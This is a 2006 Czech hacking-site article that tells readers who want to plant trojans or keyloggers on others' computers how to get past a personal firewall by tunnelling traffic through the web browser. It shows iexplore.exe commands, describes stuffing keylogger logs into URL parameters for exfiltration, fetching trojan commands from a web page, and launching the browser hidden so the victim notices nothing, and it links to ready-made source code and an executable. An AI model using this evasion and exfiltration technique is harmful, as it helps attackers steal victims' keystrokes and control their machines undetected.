Obcházíme firewall

Zdroj: SOOM.cz [ISSN 1804-7270]
Autor: .cCuMiNn.
Datum: 26.4.2006
Hodnocení/Hlasovalo: 3.78/85

Poradili jste si již s antivirem tím, že jste začali psát vlastní programy, které nejsou ve virových databázích? Stále však nevíte jak obelstít firewall aby si nevšiml síťových aktivit vašeho programu? V tomto článku najdete jedno z možných řešení...

Jistě jste se již několikrát pokoušeli podstrčit někomu trojského koně nebo keylogger. Vaše pokusy však často ztroskotaly na antiviru. Ten totiž vede známé programy tohoto druhu ve své virové databázi a vám proto blokoval cestu k jejich úspěšnému nainstalování. Jedinou cestou se pro vás tedy staly programy vlastní tvorby. Nemáte-li s tvorbou podobných programů zatím žádné zkušenosti, dovolím si vám doporučit článek o programování trojských koní, který vyšel před pár dny na Security-portalu. Podle doporučeného článku si dokáže sestavit backdoor opravdu každý. Zbývá tedy pouze instalace námi vytvořeného programu, při které nám již antivir nebude stát v cestě a nám se instalace bez potíží zdaří. Jaké je však naše překvapení, když při prvním pokusu o přístup k síti začne firewall řvát, přístup k síti programu zablokuje a upozorní na tuto skutečnost uživatele? Hrozná pruda, co? Ale co teď? Přeci musí existovat nějaký způsob jak firewall obejít… Ano existuje.
Těchto způsobů je hned celá řada a my se na jeden z nich blíže podíváme.

Skrytí za webový browser

Popsaná metoda využívá skutečnosti, že 99% uživatelů má na firewallu vytvořené pravidlo, které povoluje přístup k síti webovému browseru. Komu by se také chtělo explicitně povolovat přístup při každém spuštění prohlížeče?
Na tuto skutečnost upozorňoval již v roce 2001 Steve Gibbon. Mnoho se však od těch časů nezměnilo a my tak můžeme stále této slabiny využívat.

Odeslání dat na server

Abychom si tuto metodu přiblížili co nejjednodušeji začneme příkladem, kdy v příkazovém řádku (musíme mít aktivní adresář s IE. Často je tímto adresářem „C:\Program Files\Internet Explorer“) zadáme tento příkaz:

iexplore.exe http://www.soom.cz

Pozn. V tomto článku používám Internet Explorer, který stále patří mezi nejrozšířenější prohlížeče. Můžete však podobné příklady zkusit i na jiných browserech.

Jak vidíte, spustil se Internet Explorer a automaticky se přihlásil na stránku www.soom.cz, bez toho aby firewall cokoliv namítal. Nemá také proč vždyť jde o obyčejné spuštění browseru, který má přístup k síti povolen.
Nyní rozšíříme náš příkaz o data, která budeme zasílat webovému serveru:

iexplore.exe http://www.soom.cz/index.php?name=discussion/main

V tomto příkladě zasíláme v proměnné name hodnotu discussion/main a co na to firewall? Stále mlčí? Nyní si představte, že proměnné name přiřadíte hodnotu, která bude logem z keyloggeru a tento log necháme webovým serverem uložit do databáze nebo do souboru. Myslíte si, že se přístup firewallu nějakým způsobem změní? Stejně tak může náš keylogger uložit data do clipboadu a následně se pouze přihlásit na adresu, kde bude čekat javascriptový kód, jež si obsah clipboardu vytáhne a uloží. Možností jak data na server dostat je opravdu hodně.

Příjem dat ze serveru

Příjem dat ze serveru je stejně jednoduchý jako jejich zaslání serveru. V podstatě neuděláme nic jiného než, že se k serveru přihlásíme stejně jako v předchozích příkladech:

iexplore.exe http://www.soom.cz

Co myslíte? Obdrželi jste po zadání tohoto příkazu od serveru nějaká data? Ano, těmito daty je celý obsah webové stránky, který může obsahovat příkazy pro trojského koně a jakákoliv jiná data, která stačí pomocí programu pouze vypreparovat a provést. A co na to firewall? Stále mlčí?

Závěrem

Co nás na předchozích příkladech asi nejvíce zaráželo, byla zcela jistě nápadnost celého našeho počínání. Vždyť se před našimi zraky otevíralo okno browseru, které si rozhodně nehrálo na to, že by chtělo vypadat skrytě.
Tohoto neduhu se však můžeme velice jednouše zbavit tím, že budeme z našeho programu spouštět browser jako skrytý a napadený uživatel tak nezpozoruje žádnou podezřelou aktivitu.

Myslím si že nejvíce o celé věci řekne zdrojový kód programu, který slouží k otestování průchodnosti vašeho firewallu a další slova jsou zde zbytečná…

Download zdrojových kódů
Download spustitelného programu

Použité zdroje: http://tooleaky.zensoft.com
Poznámka: Uvedené příklady nemusí fungovat na všech firewallech.

.cCuMiNn.